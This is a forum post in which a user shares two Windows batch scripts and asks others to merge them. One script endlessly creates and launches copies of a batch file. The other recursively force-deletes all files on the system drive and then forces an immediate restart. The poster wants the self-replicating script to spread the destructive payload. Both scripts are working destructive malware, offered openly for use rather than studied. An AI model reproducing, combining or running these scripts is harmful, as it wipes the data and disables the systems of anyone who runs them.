Post: Intersting idea.
03-22-2011, 09:52 PM #1
(adsbygoogle = window.adsbygoogle || []).push({}); Okay so i have this batch file which creates 1999999999 empty batch files. And i have a batch file which causes a blue screen of death. I was wondering if anyone could alter the first batch to where all of the created batch files had something in them instead of being empty.
Here are the two batch files .

Alot of files
Originally posted by another user
@echo off
:A
SET /A X=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A


BSOD
Originally posted by another user
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
(adsbygoogle = window.adsbygoogle || []).push({});

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo